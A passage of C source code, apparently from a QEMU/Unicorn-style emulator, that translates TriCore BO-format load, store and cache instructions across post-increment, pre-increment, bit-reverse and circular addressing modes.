OPC2_32_BIT_SH_NAND_T: gen_bit_1op(ctx, temp, tcg_ctx->cpu_gpr_d[r1] , tcg_ctx->cpu_gpr_d[r2] , pos1, pos2, &tcg_gen_nand_tl); break; case OPC2_32_BIT_SH_ORN_T: gen_bit_1op(ctx, temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_orc_tl); break; case OPC2_32_BIT_SH_XNOR_T: gen_bit_1op(ctx, temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_eqv_tl); break; case OPC2_32_BIT_SH_XOR_T: gen_bit_1op(ctx, temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_xor_tl); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3], 1); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3], temp); tcg_temp_free(tcg_ctx, temp); } /* 
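 * The decoders below implement base+offset addressing: a signed 10-bit
 * offset (MASK_OP_BO_OFF10_SEXT) applied to an address register A[b],
 * in short-offset, post-increment, pre-increment, bit-reverse and
 * circular variants, as the case labels show. This is the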
BO-format */ static void decode_bo_addrmode_post_pre_base(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t off10; int32_t r1, r2; TCGv temp; r1 = MASK_OP_BO_S1D(ctx->opcode); r2 = MASK_OP_BO_S2(ctx->opcode); off10 = MASK_OP_BO_OFF10_SEXT(ctx->opcode); op2 = MASK_OP_BO_OP2(ctx->opcode); switch (op2) { case OPC2_32_BO_CACHEA_WI_SHORTOFF: case OPC2_32_BO_CACHEA_W_SHORTOFF: case OPC2_32_BO_CACHEA_I_SHORTOFF: /* instruction to access the cache */ break; case OPC2_32_BO_CACHEA_WI_POSTINC: case OPC2_32_BO_CACHEA_W_POSTINC: case OPC2_32_BO_CACHEA_I_POSTINC: /* instruction to access the cache, but we still need to handle the addressing mode */ tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_CACHEA_WI_PREINC: case OPC2_32_BO_CACHEA_W_PREINC: case OPC2_32_BO_CACHEA_I_PREINC: /* instruction to access the cache, but we still need to handle the addressing mode */ tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_CACHEI_WI_SHORTOFF: case OPC2_32_BO_CACHEI_W_SHORTOFF: if (!has_feature(ctx, TRICORE_FEATURE_131)) { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_BO_CACHEI_W_POSTINC: case OPC2_32_BO_CACHEI_WI_POSTINC: if (has_feature(ctx, TRICORE_FEATURE_131)) { tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_BO_CACHEI_W_PREINC: case OPC2_32_BO_CACHEI_WI_PREINC: if (has_feature(ctx, TRICORE_FEATURE_131)) { tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_BO_ST_A_SHORTOFF: gen_offset_st(ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LESL); break; case OPC2_32_BO_ST_A_POSTINC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LESL); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_ST_A_PREINC: gen_st_preincr(ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LESL); break; case OPC2_32_BO_ST_B_SHORTOFF: gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_UB); break; case OPC2_32_BO_ST_B_POSTINC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_UB); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_ST_B_PREINC: gen_st_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_UB); break; case OPC2_32_BO_ST_D_SHORTOFF: CHECK_REG_PAIR(r1); gen_offset_st_2regs(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_ST_D_POSTINC: CHECK_REG_PAIR(r1); gen_st_2regs_64(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2]); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_ST_D_PREINC: CHECK_REG_PAIR(r1); temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_st_2regs_64(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], temp); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], temp); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_BO_ST_DA_SHORTOFF: CHECK_REG_PAIR(r1); gen_offset_st_2regs(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], off10); break; case 
OPC2_32_BO_ST_DA_POSTINC: CHECK_REG_PAIR(r1); gen_st_2regs_64(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_ST_DA_PREINC: CHECK_REG_PAIR(r1); temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_st_2regs_64(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1], temp); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], temp); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_BO_ST_H_SHORTOFF: gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUW); break; case OPC2_32_BO_ST_H_POSTINC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUW); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_ST_H_PREINC: gen_st_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUW); break; case OPC2_32_BO_ST_Q_SHORTOFF: temp = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); gen_offset_st(ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUW); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_BO_ST_Q_POSTINC: temp = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_qemu_st_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUW); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_BO_ST_Q_PREINC: temp = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); gen_st_preincr(ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUW); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_BO_ST_W_SHORTOFF: gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUL); break; case OPC2_32_BO_ST_W_POSTINC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUL); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_ST_W_PREINC: gen_st_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUL); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_bo_addrmode_bitreverse_circular(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t off10; int32_t r1, r2; TCGv temp, temp2, temp3; r1 = MASK_OP_BO_S1D(ctx->opcode); r2 = MASK_OP_BO_S2(ctx->opcode); off10 = MASK_OP_BO_OFF10_SEXT(ctx->opcode); op2 = MASK_OP_BO_OP2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); temp3 = tcg_const_i32(tcg_ctx, off10); CHECK_REG_PAIR(r2); tcg_gen_ext16u_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2+1]); tcg_gen_add_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2], temp); switch (op2) { case OPC2_32_BO_CACHEA_WI_BR: case OPC2_32_BO_CACHEA_W_BR: case OPC2_32_BO_CACHEA_I_BR: gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_CACHEA_WI_CIRC: case OPC2_32_BO_CACHEA_W_CIRC: case OPC2_32_BO_CACHEA_I_CIRC: gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_ST_A_BR: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_ST_A_CIRC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp2, ctx->mem_idx, 
MO_LEUL); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_ST_B_BR: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_UB); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_ST_B_CIRC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_UB); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_ST_D_BR: CHECK_REG_PAIR(r1); gen_st_2regs_64(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], temp2); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_ST_D_CIRC: CHECK_REG_PAIR(r1); tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUL); tcg_gen_shri_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2+1], 16); tcg_gen_addi_tl(tcg_ctx, temp, temp, 4); tcg_gen_rem_tl(tcg_ctx, temp, temp, temp2); tcg_gen_add_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2], temp); tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1+1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_ST_DA_BR: CHECK_REG_PAIR(r1); gen_st_2regs_64(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1], temp2); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_ST_DA_CIRC: CHECK_REG_PAIR(r1); tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp2, ctx->mem_idx, MO_LEUL); tcg_gen_shri_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2+1], 16); tcg_gen_addi_tl(tcg_ctx, temp, temp, 4); tcg_gen_rem_tl(tcg_ctx, temp, temp, temp2); tcg_gen_add_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2], temp); tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1+1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_ST_H_BR: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUW); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_ST_H_CIRC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUW); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_ST_Q_BR: tcg_gen_shri_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_qemu_st_tl(tcg_ctx, temp, temp2, ctx->mem_idx, MO_LEUW); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_ST_Q_CIRC: tcg_gen_shri_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_qemu_st_tl(tcg_ctx, temp, temp2, ctx->mem_idx, MO_LEUW); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_ST_W_BR: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_ST_W_CIRC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); } static void decode_bo_addrmode_ld_post_pre_base(DisasContext *ctx) { TCGContext *tcg_ctx = 
ctx->uc->tcg_ctx;
    uint32_t op2;
    uint32_t off10;
    int32_t r1, r2;
    TCGv temp;

    r1 = MASK_OP_BO_S1D(ctx->opcode);
    r2 = MASK_OP_BO_S2(ctx->opcode);
    off10 = MASK_OP_BO_OFF10_SEXT(ctx->opcode);
    op2 = MASK_OP_BO_OP2(ctx->opcode);

    switch (op2) {
    case OPC2_32_BO_LD_A_SHORTOFF:
        gen_offset_ld(ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2],
                      off10, MO_LEUL);
        break;
    case OPC2_32_BO_LD_A_POSTINC:
        tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1],
                           tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUL);
        tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2],
                        tcg_ctx->cpu_gpr_a[r2], off10);
        break;
    case OPC2_32_BO_LD_A_PREINC:
        gen_ld_preincr(ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2],
                       off10, MO_LEUL);
        break;
    case OPC2_32_BO_LD_B_SHORTOFF:
        gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2],
                      off10, MO_SB);
        break;
    case OPC2_32_BO_LD_B_POSTINC:
        tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1],
                           tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_SB);
        tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2],
                        tcg_ctx->cpu_gpr_a[r2], off10);
        break;
    case OPC2_32_BO_LD_B_PREINC:
        gen_ld_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2],
                       off10, MO_SB);
        break;
    case OPC2_32_BO_LD_BU_SHORTOFF:
        gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2],
                      off10, MO_UB);
        break;
    case OPC2_32_BO_LD_BU_POSTINC:
        tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1],
                           tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_UB);
        tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2],
                        tcg_ctx->cpu_gpr_a[r2], off10);
        break;
    case OPC2_32_BO_LD_BU_PREINC:
        /* LD.BU zero-extends, like the short-offset and post-increment
           forms above */
        gen_ld_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2],
                       off10, MO_UB);
        break;
    case OPC2_32_BO_LD_D_SHORTOFF:
        CHECK_REG_PAIR(r1);
        gen_offset_ld_2regs(ctx, tcg_ctx->cpu_gpr_d[r1+1],
                            tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2],
                            off10);
        break;
    case OPC2_32_BO_LD_D_POSTINC:
        CHECK_REG_PAIR(r1);
        gen_ld_2regs_64(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1],
                        tcg_ctx->cpu_gpr_a[r2]);
        tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2],
                        tcg_ctx->cpu_gpr_a[r2], off10);
        break;
    case OPC2_32_BO_LD_D_PREINC:
        CHECK_REG_PAIR(r1);
        temp = tcg_temp_new(tcg_ctx);
        tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10);
        gen_ld_2regs_64(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1],
                        temp);
        tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], temp);
        tcg_temp_free(tcg_ctx, temp);
        break;
    case OPC2_32_BO_LD_DA_SHORTOFF:
        CHECK_REG_PAIR(r1);
        gen_offset_ld_2regs(ctx, tcg_ctx->cpu_gpr_a[r1+1],
                            tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2],
                            off10);
        break;
    case OPC2_32_BO_LD_DA_POSTINC:
        CHECK_REG_PAIR(r1);
        gen_ld_2regs_64(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1],
                        tcg_ctx->cpu_gpr_a[r2]);
        tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2],
                        tcg_ctx->cpu_gpr_a[r2], off10);
        break;
    case OPC2_32_BO_LD_DA_PREINC:
        CHECK_REG_PAIR(r1);
        temp = tcg_temp_new(tcg_ctx);
        tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10);
        gen_ld_2regs_64(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1],
                        temp);
        tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], temp);
        tcg_temp_free(tcg_ctx, temp);
        break;
    case OPC2_32_BO_LD_H_SHORTOFF:
        gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2],
                      off10, MO_LESW);
        break;
    case OPC2_32_BO_LD_H_POSTINC:
        tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1],
                           tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LESW);
        tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2],
                        tcg_ctx->cpu_gpr_a[r2], off10);
        break;
    case OPC2_32_BO_LD_H_PREINC:
        gen_ld_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2],
                       off10, MO_LESW);
        break;
    case OPC2_32_BO_LD_HU_SHORTOFF:
        gen_offset_ld(ctx,
tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUW); break; case OPC2_32_BO_LD_HU_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUW); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_LD_HU_PREINC: gen_ld_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUW); break; case OPC2_32_BO_LD_Q_SHORTOFF: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUW); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 16); break; case OPC2_32_BO_LD_Q_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUW); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_LD_Q_PREINC: gen_ld_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUW); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 16); break; case OPC2_32_BO_LD_W_SHORTOFF: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUL); break; case OPC2_32_BO_LD_W_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUL); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_LD_W_PREINC: gen_ld_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUL); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_bo_addrmode_ld_bitreverse_circular(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t off10; int r1, r2; TCGv temp, temp2, temp3; r1 = MASK_OP_BO_S1D(ctx->opcode); r2 = MASK_OP_BO_S2(ctx->opcode); off10 = MASK_OP_BO_OFF10_SEXT(ctx->opcode); op2 = MASK_OP_BO_OP2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); temp3 = tcg_const_i32(tcg_ctx, off10); CHECK_REG_PAIR(r2); tcg_gen_ext16u_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2+1]); tcg_gen_add_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2], temp); switch (op2) { case OPC2_32_BO_LD_A_BR: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_A_CIRC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_LD_B_BR: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_SB); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_B_CIRC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_SB); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_LD_BU_BR: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_UB); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_BU_CIRC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_UB); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_LD_D_BR: CHECK_REG_PAIR(r1); gen_ld_2regs_64(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], temp2); 
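        /*
         * Bit-reverse bookkeeping lives in A[b+1]: the low halfword is the
         * current index (already added to A[b] above to form the effective
         * address in temp2), the high halfword the increment. As I read
         * gen_helper_br_update, it advances the index as
         *     index = reverse16(reverse16(index) + reverse16(increment))
         * which gives the bit-reversed walks used by FFT-style kernels.
         */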
gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_D_CIRC: CHECK_REG_PAIR(r1); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUL); tcg_gen_shri_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2+1], 16); tcg_gen_addi_tl(tcg_ctx, temp, temp, 4); tcg_gen_rem_tl(tcg_ctx, temp, temp, temp2); tcg_gen_add_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2], temp); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1+1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_LD_DA_BR: CHECK_REG_PAIR(r1); gen_ld_2regs_64(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1], temp2); 